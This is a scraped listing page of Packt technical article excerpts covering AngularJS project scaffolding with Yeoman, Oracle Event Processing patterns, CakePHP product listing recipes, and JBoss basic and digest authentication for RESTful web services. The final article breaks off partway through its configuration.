specify items in a dataset that they are interested in. The REST Architectural components in the image can be chained one after the other as shown priorly. For example, there can be a filter chain, consisting of filters related with Authentication, Rate limiting, Caching, and Logging. This will take care of authenticating the user, checking if the requests from the client are within rate limits, then a caching filter which can check if the request can be served from the cache respectively. This can be followed by a logging filter, which can log the details of the request. For more details, check RESTful Patterns and best practices.
Read more
  • 0
  • 0
  • 2004

article-image-angularjs-project
Packt
19 Aug 2014
14 min read
Save for later

AngularJS Project

Packt
19 Aug 2014
14 min read
This article by Jonathan Spratley, the author of book, Learning Yeoman, covers the steps of how to create an AngularJS project and previewing our application. (For more resources related to this topic, see here.) Anatomy of an Angular project Generally in a single page application (SPA), you create modules that contain a set of functionality, such as a view to display data, a model to store data, and a controller to manage the relationship between the two. Angular incorporates the basic principles of the MVC pattern into how it builds client-side web applications. The major Angular concepts are as follows: Templates : A template is used to write plain HTML with the use of directives and JavaScript expressions Directives : A directive is a reusable component that extends HTML with the custom attributes and elements Models : A model is the data that is displayed to the user and manipulated by the user Scopes : A scope is the context in which the model is stored and made available to controllers, directives, and expressions Expressions : An expression allows access to variables and functions defined on the scope Filters : A filter formats data from an expression for visual display to the user Views : A view is the visual representation of a model displayed to the user, also known as the Document Object Model (DOM) Controllers : A controller is the business logic that manages the view Injector : The injector is the dependency injection container that handles all dependencies Modules : A module is what configures the injector by specifying what dependencies the module needs Services : A service is a piece of reusable business logic that is independent of views Compiler : The compiler handles parsing templates and instantiating directives and expressions Data binding : Data binding handles keeping model data in sync with the view Why Angular? AngularJS is an open source JavaScript framework known as the Superheroic JavaScript MVC Framework, which is actively maintained by the folks over at Google. Angular attempts to minimize the effort in creating web applications by teaching the browser's new tricks. This enables the developers to use declarative markup (known as directives or expressions) to handle attaching the custom logic behind DOM elements. Angular includes many built-in features that allow easy implementation of the following: Two-way data binding in views using double mustaches {{ }} DOM control for repeating, showing, or hiding DOM fragments Form submission and validation handling Reusable HTML components with self-contained logic Access to RESTful and JSONP API services The major benefit of Angular is the ability to create individual modules that handle specific responsibilities, which come in the form of directives, filters, or services. This enables developers to leverage the functionality of the custom modules by passing in the name of the module in the dependencies. Creating a new Angular project Now it is time to build a web application that uses some of Angular's features. The application that we will be creating will be based on the scaffold files created by the Angular generator; we will add functionality that enables CRUD operations on a database. Installing the generator-angular To install the Yeoman Angular generator, execute the following command: $ npm install -g generator-angular For Karma testing, the generator-karma needs to be installed. Scaffolding the application To scaffold a new AngularJS application, create a new folder named learning-yeoman-ch3 and then open a terminal in that location. Then, execute the following command: $ yo angular --coffee This command will invoke the AngularJS generator to scaffold an AngularJS application, and the output should look similar to the following screenshot: Understanding the directory structure Take a minute to become familiar with the directory structure of an Angular application created by the Yeoman generator: app: This folder contains all of the front-end code, HTML, JS, CSS, images, and dependencies: images: This folder contains images for the application scripts: This folder contains AngularJS codebase and business logic: app.coffee: This contains the application module definition and routing controllers: Custom controllers go here: main.coffee: This is the main controller created by default directives: Custom directives go here filters: Custom filters go here services: Reusable application services go here styles: This contains all CSS/LESS/SASS files: main.css: This is the main style sheet created by default views: This contains the HTML templates used in the application main.html: This is the main view created by default index.html: This is the applications' entry point bower_components: This folder contains client-side dependencies node_modules: This contains all project dependencies as node modules test: This contains all the tests for the application: spec: This contains unit tests mirroring structure of the app/scripts folder karma.conf.coffee: This file contains the Karma runner configuration Gruntfile.js: This file contains all project tasks package.json: This file contains project information and dependencies bower.json: This file contains frontend dependency settings The directories (directives, filters, and services) get created when the subgenerator is invoked. Configuring the application Let's go ahead and create a configuration file that will allow us to store the application wide properties; we will use the Angular value services to reference the configuration object. Open up a terminal and execute the following command: $ yo angular:value Config This command will create a configuration service located in the app/scripts/services directory. This service will store global properties for the application. For more information on Angular services, visit http://goo.gl/Q3f6AZ. Now, let's add some settings to the file that we will use throughout the application. Open the app/scripts/services/config.coffee file and replace with the following code: 'use strict' angular.module('learningYeomanCh3App').value('Config', Config = baseurl: document.location.origin sitetitle: 'learning yeoman' sitedesc: 'The tutorial for Chapter 3' sitecopy: '2014 Copyright' version: '1.0.0' email: '[email protected]' debug: true feature: title: 'Chapter 3' body: 'A starting point for a modern angular.js application.' image: 'http://goo.gl/YHBZjc' features: [ title: 'yo' body: 'yo scaffolds out a new application.' image: 'http://goo.gl/g6LO99' , title: 'Bower' body: 'Bower is used for dependency management.' image: 'http://goo.gl/GpxBAx' , title: 'Grunt' body: 'Grunt is used to build, preview and test your project.' image: 'http://goo.gl/9M00hx' ] session: authorized: false user: null layout: header: 'views/_header.html' content: 'views/_content.html' footer: 'views/_footer.html' menu: [ title: 'Home', href: '/' , title: 'About', href: '/about' , title: 'Posts', href: '/posts' ] ) The preceding code does the following: It creates a new Config value service on the learningYeomanCh3App module The baseURL property is set to the location where the document originated from The sitetitle, sitedesc, sitecopy, and version attributes are set to default values that will be displayed throughout the application The feature property is an object that contains some defaults for displaying a feature on the main page The features property is an array of feature objects that will display on the main page as well The session property is defined with authorized set to false and user set to null; this value gets set to the current authenticated user The layout property is an object that defines the paths of view templates, which will be used for the corresponding keys The menu property is an array that contains the different pages of the application Usually, a generic configuration file is created at the top level of the scripts folder for easier access. Creating the application definition During the initial scaffold of the application, an app.coffee file is created by Yeoman located in the app/scripts directory. The scripts/app.coffee file is the definition of the application, the first argument is the name of the module, and the second argument is an array of dependencies, which come in the form of angular modules and will be injected into the application upon page load. The app.coffee file is the main entry point of the application and does the following: Initializes the application module with dependencies Configures the applications router Any module dependencies that are declared inside the dependencies array are the Angular modules that were selected during the initial scaffold. Consider the following code: 'use strict' angular.module('learningYeomanCh3App', [ 'ngCookies', 'ngResource', 'ngSanitize', 'ngRoute' ]) .config ($routeProvider) -> $routeProvider .when '/', templateUrl: 'views/main.html' controller: 'MainCtrl' .otherwise redirectTo: '/' The preceding code does the following: It defines an angular module named learningYeomanCh3App with dependencies on the ngCookies, ngSanitize, ngResource, and ngRoute modules The .config function on the module configures the applications' routes by passing route options to the $routeProvider service Bower downloaded and installed these modules during the initial scaffold. Creating the application controller Generally, when creating an Angular application, you should define a top-level controller that uses the $rootScope service to configure some global application wide properties or methods. To create a new controller, use the following command: $ yo angular:controller app This command will create a new AppCtrl controller located in the app/scripts/controllers directory. file and replace with the following code: 'use strict' angular.module('learningYeomanCh3App') .controller('AppCtrl', ($rootScope, $cookieStore, Config) -> $rootScope.name = 'AppCtrl' App = angular.copy(Config) App.session = $cookieStore.get('App.session') window.App = $rootScope.App = App) The preceding code does the following: It creates a new AppCtrl controller with dependencies on the $rootScope, $cookieStore, and Config modules Inside the controller definition, an App variable is copied from the Config value service The session property is set to the App.session cookie, if available Creating the application views The Angular generator will create the applications' index.html view, which acts as the container for the entire application. The index view is used as the shell for the other views of the application; the router handles mapping URLs to views, which then get injected to the element that declares the ng-view directive. Modifying the application's index.html Let's modify the default view that was created by the generator. Open the app/index.html file, and add the content right below the following HTML comment: The structure of the application will consist of an article element that contains a header,<article id="app" <article id="app" ng-controller="AppCtrl" class="container">   <header id="header" ng-include="App.layout.header"></header>   <section id=”content” class="view-animate-container">     <div class="view-animate" ng-view=""></div>   </section>   <footer id="footer" ng-include="App.layout.footer"></footer> </article> In the preceding code: The article element declares the ng-controller directive to the AppCtrl controller The header element uses an ng-include directive that specifies what template to load, in this case, the header property on the App.layout object The div element has the view-animate-container class that will allow the use of CSS transitions The ng-view attribute directive will inject the current routes view template into the content The footer element uses an ng-include directive to load the footer specified on the App.layout.footer property Use ng-include to load partials, which allows you to easily swap out templates. Creating Angular partials Use the yo angular:view command to create view partials that will be included in the application's main layout. So far, we need to create three partials that the index view (app/index.html) will be consuming from the App.layout property on the $rootScope service that defines the location of the templates. Names of view partials typically begin with an underscore (_). Creating the application's header The header partial will contain the site title and navigation of the application. Open a terminal and execute the following command: $ yo angular:view _header This command creates a new view template file in the app/views directory. Open the app/views/_header.html file and add the following contents: <div class="header"> <ul class="nav nav-pills pull-right"> <li ng-repeat="item in App.menu" ng-class="{'active': App.location.path() === item.href}"> <a ng-href = "#{{item.href}}"> {{item.title}} </a> </li> </ul> <h3 class="text-muted"> {{ App.sitetitle }} </h3> </div> The preceding code does the following: It uses the {{ }} data binding syntax to display App.sitetitle in a heading element The ng-repeat directive is used to repeat each item in the App.menu array defined on $rootScope Creating the application's footer The footer partial will contain the copyright message and current version of the application. Open the terminal and execute the following command: $ yo angular:view _footer This command creates a view template file in the app/views directory. Open the app/views/_footer.html file and add the following markup: <div class="app-footer container clearfix">     <span class="app-sitecopy pull-left">       {{ App.sitecopy }}     </span>     <span class="app-version pull-right">       {{ App.version }}     </span> </div> The preceding code does the following: It uses a div element to wrap two span elements The first span element contains data binding syntax referencing App.sitecopy to display the application's copyright message The second span element also contains data binding syntax to reference App.version to display the application's version Customizing the main view The Angular generator creates the main view during the initial scaffold. Open the app/views/main.html file and replace with the following markup: <div class="jumbotron">     <h1>{{ App.feature.title }}</h1>     <img ng-src="{{ App.feature.image  }}"/>       <p class="lead">       {{ App.feature.body }}       </p>   </div>     <div class="marketing">   <ul class="media-list">         <li class="media feature" ng-repeat="item in App.features">        <a class="pull-left" href="#">           <img alt="{{ item.title }}"                       src="http://placehold.it/80x80"                       ng-src="{{ item.image }}"            class="media-object"/>        </a>        <div class="media-body">           <h4 class="media-heading">{{item.title}}</h4>           <p>{{ item.body }}</p>        </div>         </li>   </ul> </div> The preceding code does the following: At the top of the view, we use the {{ }} data binding syntax to display the title and body properties declared on the App.feature object Next, inside the div.marketing element, another div element is declared with the ng-repeat directive to loop for each item in the App.features property Then, using the {{ }} data binding syntax wrapped around the title and body properties from the item being repeated, we output the values Previewing the application To preview the application, execute the following command: $ grunt serve Your browser should open displaying something similar to the following screenshot: Download the AngularJS Batarang (http://goo.gl/0b2GhK) developer tool extension for Google Chrome for debugging. Summary In this article, we learned the concepts of AngularJS and how to leverage the framework in a new or existing project. Resources for Article: Further resources on this subject: Best Practices for Modern Web Applications [article] Spring Roo 1.1: Working with Roo-generated Web Applications [article] Understand and Use Microsoft Silverlight with JavaScript [article]
Read more
  • 0
  • 0
  • 2729

Packt
14 Aug 2014
10 min read
Save for later

Additional SOA Patterns – Supporting Composition Controllers

Packt
14 Aug 2014
10 min read
In this article by Sergey Popov, author of the book Applied SOA Patterns on the Oracle Platform, we will learn some complex SOA patterns, realized on very interesting Oracle products: Coherence and Oracle Event Processing. (For more resources related to this topic, see here.) We have to admit that for SOA Suite developers and architects (especially from the old BPEL school), the Oracle Event Processing platform could be a bit outlandish. This could be the reason why some people oppose service-oriented and event-driven architecture, or see them as different architectural approaches. The situation is aggravated by the abundance of the acronyms flying around such as EDA EPN, EDN, CEP, and so on. Even here, we use EPN and EDN interchangeably, as Oracle calls it event processing, and generically, it is used in an event delivery network.   The main argument used for distinguishing SOA and EDN is that SOA relies on the application of a standardized contract principle, whereas EDN has to deal with all types of events. This is true, and we have mentioned this fact before. We also mentioned that we have to declare all the event parameters in the form of key-value pairs with their types in <event-type-repository>. We also mentioned that the reference to the event type from the event type repository is not mandatory for a standard EPN adapter, but it's essential when you are implementing a custom inbound adapter in the EPN framework, which is an extremely powerful Java-based feature. As long as it's Java, you can do practically everything! Just follow the programming flow explained in the Oracle documentation; see the EP Input Adapter Implementation section:   import org.apache.commons.logging.Log; import org.apache.commons.logging.LogFactory; import com.bea.wlevs.ede.api.EventProperty; import com.bea.wlevs.ede.api.EventRejectedException; import com.bea.wlevs.ede.api.EventType;   import com.bea.wlevs.ede.api.EventTypeRepository; import com.bea.wlevs.ede.api.RunnableBean;   import com.bea.wlevs.ede.api.StreamSender; import com.bea.wlevs.ede.api.StreamSink; import com.bea.wlevs.ede.api.StreamSource; import com.bea.wlevs.util.Service;   import java.lang.RuntimeException;   public class cargoBookingAdapter implements RunnableBean, StreamSource, StreamSink   {   static final Log v_logger = LogFactory. getLog("cargoBookingAdapter");   private String v_eventTypeName; private EventType v_eventType;        private StreamSender v_eventSender;   private EventTypeRepository v_EvtRep = null; public cargoBookingAdapter(){   super();   }   /**   *  Called by the server to pass in the name of the event   *  v_EvTypee to which event data should be bound.   */   public void setEventType(String v_EvType){ v_eventTypeName = v_EvType; }   /**   *  Called by the server to set an event v_EvTypee   *  repository instance that knows about event   *  v_EvTypees configured for this application   *   *  This repository instance will be used to retrieve an   *  event v_EvTypee instance that will be populated   *  with event data retrieved from the event data file   *  @param etr The event repository.   */   @Service(filter = EventTypeRepository.SERVICE_FILTER)   public void setEventTypeRepository(EventTypeRepository etr){ v_EvtRep = etr;   }   /**   *  Executes to retrieve raw event data and   *  create event v_EvTypee instances from it, then   *  sends the events to the next stage in the   *  EPN.   *  This method, implemented from the RunnableBean   *  interface, executes when this adapter instance   *  is active.   */   public void run()   {   if (v_EvtRep == null){   throw new RuntimeException("EventTypeRepository is   not set");   }   //  Get the event v_EvTypee from the repository by using   //  the event v_EvTypee name specified as a property of   //  this adapter in the EPN assembly file.   v_eventType = v_EvtRep.getEventType(v_eventTypeName); if (v_eventType == null){ throw new RuntimeException("EventType(" + v_eventType + ") is not found.");     }   /**   *   Actual Adapters implementation:   *             *  1. Create an object and assign to it   *      an event v_EvTypee instance generated   *      from event data retrieved by the   *      reader   *   *  2. Send the newly created event v_EvTypee instance   *      to a downstream stage that is   *      listening to this adapter.   */   }   }   }   The presented code snippet demonstrates the injection of a dependency into the Adapter class using the setEventTypeRepository method, implanting the event type definition that is specified in the adapter's configuration.   So, it appears that we, in fact, have the data format and model declarations in an XML form for the event, and we put some effort into adapting the inbound flows to our underlying component. Thus, the Adapter Framework is essential in EDN, and dependency injection can be seen here as a form of dynamic Data Model/Format Transformation of the object's data. Going further, just following the SOA reusabilityprinciple, a single adapter can be used in multiple event-processing networks and for that, we can employ the Adapter Factory pattern discussed earlier (although it's not an official SOA pattern, remember?) For that, we will need the Adapter Factory class and the registration of this factory in the EPN assembly file with a dedicated provider name, which we will use further in applications, employing the instance of this adapter. You must follow the OSGi service registry rules if you want to specify additional service properties in the <osgi:service interface="com.bea.wlevs.ede.api.AdapterFactory"> section and register it only once as an OSGi service.   We also use Asynchronous Queuing and persistence storage to provide reliable delivery of events aggregation to event subscribers, as we demonstrated in the previous paragraph. Talking about aggregation on our CQL processors, we have practically unlimited possibilities to merge and correlate various event sources, such as streams:   <query id="cargoQ1"><![CDATA[   select * from CragoBookingStream, VoyPortCallStream   where CragoBookingStream.POL_CODE = VoyPortCallStream.PORT_CODE and VoyPortCallStream.PORT_CALL_PURPOSE ="LOAD" ]]></query> Here, we employ Intermediate Routing (content-based routing) to scale and balance our event processors and also to achieve a desirable level of high availability. Combined together, all these basic SOA patterns are represented in the Event-Driven Network that has Event-Driven Messaging as one of its forms.   Simply put, the entire EDN has one main purpose: effective decoupling of event (message) providers and consumers (Loose Coupling principle) with reliable event identification and delivering capabilities. So, what is it really? It is a subset of the Enterprise Service Bus compound SOA pattern, and yes, it is a form of an extended Publish-Subscribe pattern.   Some may say that CQL processors (or bean processors) are not completely aligned with the classic ESB pattern. Well, you will not find OSB XQuery in the Canonical ESB patterns catalog either; it's just a tool that supports ESB VETRO operations in this matter. In ESB, we can also call Java Beans when it's necessary for message processing; for instance, doing complex sorts inJava Collections is far easier than in XML/XSLT, and it is worth the serialization/ deserialization efforts. In a similar way, EDN extends the classic ESB by providing the following functionalities:   •        Continuous Query Language   •        It operates on multiple streams of disparate data   •        It joins the incoming data with persisted data   •        It has the ability to plug in to any type of adapter   •        It has the ability to plug to any type of adapters   Combined together, all these features can cover almost any range of practical challenges, and the logistics example we used here in this article is probably too insignificant for such a powerful event-driven platform; however, for a more insightful look at Oracle CEP, refer to Getting Started with Oracle Event Processing 11g, Alexandre Alves, Robin J. Smith, Lloyd Williams, Packt Publishing. Using exactly the same principles and patterns, you can employ the already existing tools in your arsenal. The world is apparentlybigger, and this tool can demonstrate all its strength in the following use cases:     •    As already mentioned, Cablecom Enterprise strives to improve the overall customer experience (not only for VOD). It does so by gathering and aggregating information about user preferences through the purchasing history, watch lists, channel switching, activity in social networks, search history and used meta tags in search, other user experiences from the same target group, upcoming related public events (shows, performances, or premieres), and even the duration of the cursor's position over certain elements of corporate web portals. The task is complex and comprises many activities, including meta tag updates in metadata storage that depend on new findings for predicting trends and so on; however, here we can tolerate (to some extent) the events that aren't processed or are not received.     •    For bank transaction monitoring, we do not have such a luxury. All online events must be accounted and processed with the maximum speed possible. If the last transaction with your credit card was at Bond Street in London, (ATM cash withdrawal) and 5 minutes later, the same card is used to purchase expensive jewellery online with a peculiar delivery address, then someone should flag the card with a possible fraud case and contact the card holder. This is the simplest example that we can provide. When it comes to money laundering tracking cases in our borderless world—the decision-parsing tree from the very first figure in this article—based on all possible correlated events will require all the pages of this book, and you will need a strong magnifying glass to read it; the stratagem of the web nodes and links would drive even the most worldly wise spider crazy.   For these mentioned use cases, Oracle EPN is simply compulsory with some spice, like Coherence for cache management and adequate hardware. It would be prudent to avoid implementing homebrewed solutions (without dozens of years of relevant experience), and following the SOA design patterns is essential.   Let's now assemble all that we discussed in the preceding paragraphs in one final figure. Installation routines will not give you any trouble; just install OEPE 3.5, download it, install CEP components for Eclipse, and you are done with the client/ dev environment. The installation of the server should not pose many difficulties either (http://docs.oracle.com/cd/E28280_01/doc.1111/e14476/install.htm#CEPGS472). When the server is up and running, you can register it in Eclipse(1). The graphical interface will support you in assembling event-handling applications from adapters, processor channels, and event beans; however, knowledge of the internal organization of an XML config and application assembly files (as demonstrated in the earlier code snippets) is always beneficial. In addition to the Eclipse development environment, you have the CEP server web console (visualizer) with almost identical functionalities, which gives you a quick hand with practically all CQL constructs (2). Parallel Complex Events Processing
Read more
  • 0
  • 0
  • 856
Unlock access to the largest independent learning library in Tech for FREE!
Get unlimited access to 7500+ expert-authored eBooks and video courses covering every tech area you can think of.
Renews at €14.99/month. Cancel anytime
article-image-lightning-introduction
Packt
13 Aug 2014
11 min read
Save for later

Lightning Introduction

Packt
13 Aug 2014
11 min read
In this article by Jorge González and James Watts, the authors of CakePHP 2 Application Cookbook, we will cover the following recipes: Listing and viewing records Adding and editing records Deleting records Adding a login Including a plugin (For more resources related to this topic, see here.) CakePHP is a web framework for rapid application development (RAD), which admittedly covers a wide range of areas and possibilities. However, at its core, it provides a solid architecture for the CRUD (create/read/update/delete) interface. This chapter is a set of quick-start recipes to dive head first into using the framework and build out a simple CRUD around product management. If you want to try the code examples on your own, make sure that you have CakePHP 2.5.2 installed and configured to use a database—you should see something like this: Listing and viewing records To begin, we'll need a way to view the products available and also allow the option to select and view any one of those products. In this recipe, we'll create a listing of products as well as a page where we can view the details of a single product. Getting ready To go through this recipe, we'll first need a table of data to work with. So, create a table named products using the following SQL statement: CREATE TABLE products ( id VARCHAR(36) NOT NULL, name VARCHAR(100), details TEXT, available TINYINT(1) UNSIGNED DEFAULT 1, created DATETIME, modified DATETIME, PRIMARY KEY(id) ); We'll then need some sample data to test with, so now run this SQL statement to insert some products: INSERT INTO products (id, name, details, available, created, modified) VALUES ('535c460a-f230-4565-8378-7cae01314e03', 'Cake', 'Yummy and sweet', 1, NOW(), NOW()), ('535c4638-c708-4171-985a-743901314e03', 'Cookie', 'Browsers love cookies', 1, NOW(), NOW()), ('535c49d9-917c-4eab-854f-743801314e03', 'Helper', 'Helping you all the way', 1, NOW(), NOW()); Before we begin, we'll also need to create ProductsController. To do so, create a file named ProductsController.php in app/Controller/ and add the following content: <?php App::uses('AppController', 'Controller'); class ProductsController extends AppController { public $helpers = array('Html', 'Form'); public $components = array('Session', 'Paginator'); } Now, create a directory named Products/ in app/View/. Then, in this directory, create one file named index.ctp and another named view.ctp. How to do it... Perform the following steps: Define the pagination settings to sort the products by adding the following property to the ProductsController class: public $paginate = array('limit' => 10); Add the following index() method in the ProductsController class: public function index() { $this->Product->recursive = -1; $this->set('products', $this->paginate()); } Introduce the following content in the index.ctp file that we created: <h2><?php echo __('Products'); ?></h2><table><tr><th><?php echo $this->Paginator->sort('id'); ?></th><th><?php echo $this->Paginator->sort('name'); ?></th><th><?php echo $this->Paginator->sort('created'); ?></th></tr><?php foreach ($products as $product): ?><tr><td><?php echo $product['Product']['id']; ?></td><td><?phpecho $this->Html->link($product['Product']['name'],array('controller' => 'products', 'action' => 'view',$product['Product']['id']));?></td><td><?php echo $this->Time->nice($product['Product']['created']); ?></td></tr><?php endforeach; ?></table><div><?php echo $this->Paginator->counter(array('format' => __('Page{:page} of {:pages}, showing {:current} records out of {:count}total, starting on record {:start}, ending on {:end}'))); ?></div><div><?phpecho $this->Paginator->prev(__('< previous'), array(), null,array('class' => 'prev disabled'));echo $this->Paginator->numbers(array('separator' => ''));echo $this->Paginator->next(__('next >'), array(), null,array('class' => 'next disabled'));?></div> Returning to the ProductsController class, add the following view() method to it: public function view($id) {if (!($product = $this->Product->findById($id))) {throw new NotFoundException(__('Product not found'));}$this->set(compact('product'));} Introduce the following content in the view.ctp file: <h2><?php echo h($product['Product']['name']); ?></h2><p><?php echo h($product['Product']['details']); ?></p><dl><dt><?php echo __('Available'); ?></dt><dd><?php echo __((bool)$product['Product']['available'] ? 'Yes': 'No'); ?></dd><dt><?php echo __('Created'); ?></dt><dd><?php echo $this->Time->nice($product['Product']['created']); ?></dd><dt><?php echo __('Modified'); ?></dt><dd><?php echo $this->Time->nice($product['Product']['modified']); ?></dd></dl> Now, navigating to /products in your web browser will display a listing of the products, as shown in the following screenshot: Clicking on one of the product names in the listing will redirect you to a detailed view of the product, as shown in the following screenshot: How it works... We started by defining the pagination setting in our ProductsController class, which defines how the results are treated when returning them via the Paginator component (previously defined in the $components property of the controller). Pagination is a powerful feature of CakePHP, which extends well beyond simply defining the number of results or sort order. We then added an index() method to our ProductsController class, which returns the listing of products. You'll first notice that we accessed a $Product property on the controller. This is the model that we are acting against to read from our table in the database. We didn't create a file or class for this model, as we're taking full advantage of the framework's ability to determine the aspects of our application through convention. Here, as our controller is called ProductsController (in plural), it automatically assumes a Product (in singular) model. Then, in turn, this Product model assumes a products table in our database. This alone is a prime example of how CakePHP can speed up development by making use of these conventions. You'll also notice that in our ProductsController::index() method, we set the $recursive property of the Product model to -1. This is to tell our model that we're not interested in resolving any associations on it. Associations are other models that are related to this one. This is another powerful aspect of CakePHP. It allows you to determine how models are related to each other, allowing the framework to dynamically generate those links so that you can return results with the relations already mapped out for you. We then called the paginate() method to handle the resolving of the results via the Paginator component. It's common practice to set the $recursive property of all models to -1 by default. This saves heavy queries where associations are resolved to return the related models, when it may not be necessary for the query at hand. This can be done via the AppModel class, which all models extend, or via an intermediate class that you may be using in your application. We had also defined a view($id) method, which is used to resolve a single product and display its details. First, you probably noticed that our method receives an $id argument. By default, CakePHP treats the arguments in methods for actions as parts of the URL. So, if we have a product with an ID of 123, the URL would be /products/view/123. In this case, as our argument doesn't have a default value, in its absence from the URL, the framework would return an error page, which states that an argument was required. You will also notice that our IDs in the products table aren't sequential numbers in this case. This is because we defined our id field as VARCHAR(36). When doing this, CakePHP will use a Universally Unique Identifier (UUID) instead of an auto_increment value. To use a UUID instead of a sequential ID, you can use either CHAR(36) or BINARY(36). Here, we used VARCHAR(36), but note that it can be less performant than BINARY(36) due to collation. The use of UUID versus a sequential ID is usually preferred due to obfuscation, where it's harder to guess a string of 36 characters, but also more importantly, if you use database partitioning, replication, or any other means of distributing or clustering your data. We then used the findById() method on the Product model to return a product by it's ID (the one passed to the action). This method is actually a magic method. Just as you can return a record by its ID, by changing the method to findByAvailable(). For example, you would be able to get all records that have the given value for the available field in the table. These methods are very useful to easily perform queries on the associated table without having to define the methods in question. We also threw NotFoundException for the cases in which a product isn't found for the given ID. This exception is HTTP aware, so it results in an error page if thrown from an action. Finally, we used the set() method to assign the result to a variable in the view. Here we're using the compact() function in PHP, which converts the given variable names into an associative array, where the key is the variable name, and the value is the variable's value. In this case, this provides a $product variable with the results array in the view. You'll find this function useful to rapidly assign variables for your views. We also created our views using HTML, making use of the Paginator, Html, and Time helpers. You may have noticed that the usage of TimeHelper was not declared in the $helpers property of our ProductsController. This is because CakePHP is able to find and instantiate helpers from the core or the application automatically, when it's used in the view for the first time. Then, the sort() method on the Paginator helper helps you create links, which, when clicked on, toggle the sorting of the results by that field. Likewise, the counter(), prev(), numbers(), and next() methods create the paging controls for the table of products. You will also notice the structure of the array that we assigned from our controller. This is the common structure of results returned by a model. This can vary slightly, depending on the type of find() performed (in this case, all), but the typical structure would be as follows (using the real data from our products table here): Array([0] => Array([Product] => Array([id] => 535c460a-f230-4565-8378-7cae01314e03[name] => Cake[details] => Yummy and sweet[available] => true[created] => 2014-06-12 15:55:32[modified] => 2014-06-12 15:55:32))[1] => Array([Product] => Array([id] => 535c4638-c708-4171-985a-743901314e03[name] => Cookie[details] => Browsers love cookies[available] => true[created] => 2014-06-12 15:55:33[modified] => 2014-06-12 15:55:33))[2] => Array([Product] => Array([id] => 535c49d9-917c-4eab-854f-743801314e03[name] => Helper[details] => Helping you all the way[available] => true[created] => 2014-06-12 15:55:34[modified] => 2014-06-12 15:55:34))) We also used the link() method on the Html helper, which provides us with the ability to perform reverse routing to generate the link to the desired controller and action, with arguments if applicable. Here, the absence of a controller assumes the current controller, in this case, products. Finally, you may have seen that we used the __() function when writing text in our views. This function is used to handle translations and internationalization of your application. When using this function, if you were to provide your application in various languages, you would only need to handle the translation of your content and would have no need to revise and modify the code in your views. There are other variations of this function, such as __d() and __n(), which allow you to enhance how you handle the translations. Even if you have no initial intention of providing your application in multiple languages, it's always recommended that you use these functions. You never know, using CakePHP might enable you to create a world class application, which is offered to millions of users around the globe!
Read more
  • 0
  • 0
  • 1100

article-image-importance-securing-web-services
Packt
23 Jul 2014
10 min read
Save for later

The Importance of Securing Web Services

Packt
23 Jul 2014
10 min read
(For more resources related to this topic, see here.) In the upcoming sections of this article we are going to briefly explain several concepts about the importance of securing web services. The importance of security The management of securities is one of the main aspects to consider when designing applications. No matter what, neither the functionality nor the information of organizations can be exposed to all users without any kind of restriction. Suppose the case of a human resource management application that allows you to consult wages of their employees, for example, if the company manager needs to know the salary of one of their employees, it is not something of great importance. But in the same context, imagine that one of the employees wants to know the salary of their colleagues, if access to this information is completely open, it could generate problems among employees with varied salaries. Security management options Java provides some options for security management. Right now we will explain some of them and demonstrate how to implement them. All authentication methods are practically based on credentials delivery from the client to the server. In order to perform this, there are several methods: BASIC authentication DIGEST authentication CLIENT CERT authentication Using API keys The Security Management in applications built with Java including those ones with RESTful web services, always rely on JAAS. Basic authentication by providing user credentials Possibly one of the most used techniques in all kind of applications. The user, before gaining functionality over the application is requested to enter a username and password both are validated in order to verify if credentials are correct (belongs to an application user). We are 99 percent sure you have performed this technique at least once, maybe through a customized mechanism, or if you used JEE platform, probably through JAAS. This kind of control is known as basic authentication. In order to have a working example, let’s start our application server JBoss AS 7, then go to bin directory and execute the file add-user.bat (.sh file for UNIX users). Finally, we will create a new user as follows: As a result, we will have a new user in JBOSS_HOME/standalone/configuration/application - users.properties file. JBoss is already set with a default security domain called other; the same one uses the information stored in the file we mentioned earlier in order to authenticate. Right now we are going to configure the application to use this security domain, inside the folder WEB-INF from resteasy-examples project, let's create a file named jboss-web.xml with the following content: <?xml version="1.0" encoding="UTF-8"?> <jboss-web> <security-domain>other</security-domain> </jboss-web> Alright, let's configure the file web.xml in order to aggregate the securities constraints. In the following block of code, you will see on bold what you should add: <?xml version="1.0" encoding="UTF-8"?> <web-app version="3.0" xsi_schemaLocation="http://java.sun.com/xml/ns/javaee http://java.sun.com/xml/ns/javaee/web-app_3_0.xsd"> <!-- Roles --> <security-role> <description>Any rol </description> <role-name>*</role-name> </security-role> <!-- Resource / Role Mapping --> <security-constraint> <display-name>Area secured</display-name> <web-resource-collection> <web-resource-name>protected_resources</web-resource-name> <url-pattern>/services/*</url-pattern> <http-method>GET</http-method> <http-method>POST</http-method> </web-resource-collection> <auth-constraint> <description>User with any role</description> <role-name>*</role-name> </auth-constraint> </security-constraint> <login-config> <auth-method>BASIC</auth-method> </login-config> </web-app> From a terminal let's go to the home folder of the resteasy-examples project and execute mvn jboss-as:redeploy. Now we are going to test our web service as we did earlier by using SoapUI. We are going to perform request using the POST method to the URL SOAP UI shows us the HTTP 401 error; this means that the request wasn't authorized. This is because we performed the request without delivering the credentials to the server. Digest access authentication This authentication method makes use of a hash function to encrypt the password entered by the user before sending it to the server. This makes it obviously much safer than the BASIC authentication method, in which the user’s password travels in plain text that can be easily read by whoever intercepts. To overcome such drawbacks, digest MD5 authentication applies a function on the combination of the values of the username, realm of application security, and password. As a result we obtain an encrypted string that can hardly be interpreted by an intruder. Now, in order to perform what we explained before, we need to generate a password for our example user. And we have to generate it using the parameters we talked about earlier; username, realm, and password. Let’s go into the directory of JBOSS_HOME/modules/org/picketbox/main/ from a terminal and type the following: java -cp picketbox-4.0.7.Final.jar org.jboss. security.auth.callback.RFC2617Digest username MyRealmName password We will obtain the following result: RFC2617 A1 hash: 8355c2bc1aab3025c8522bd53639c168 Through this process we obtain the encrypted password, and use it in our password storage file (the JBOSS_HOME/standalone/configuration/application-users.properties). We must replace the password in the file and it will be used for the user username. We have to replace it because the old password doesn't contain the realm name information of the application. Next, We have to modify the web.xml file in the tag auth-method and change the value FORM to DIGEST, and we should set the application realm name this way: <login-config> <auth-method>DIGEST</auth-method> <realm-name>MyRealmName</realm-name> </login-config> Now, let's create a new security domain in JBoss, so we can manage the authentication mechanism DIGEST. In the file JBOSS_HOME/standalone/configuration/standalone.xml, on the section <security-domains>, let's add the following entry: <security-domain name="domainDigest" cache-type ="default"> <authentication> <login-module code="UsersRoles" flag="required"> <module-option name="usersProperties" value="${jboss.server.config.dir} /application-users.properties"/> <module-option name="rolesProperties" value="${jboss.server.config.dir}/ application-roles.properties"/> <module-option name="hashAlgorithm" value="MD5"/> <module-option name= "hashEncoding" value="RFC2617"/> <module-option 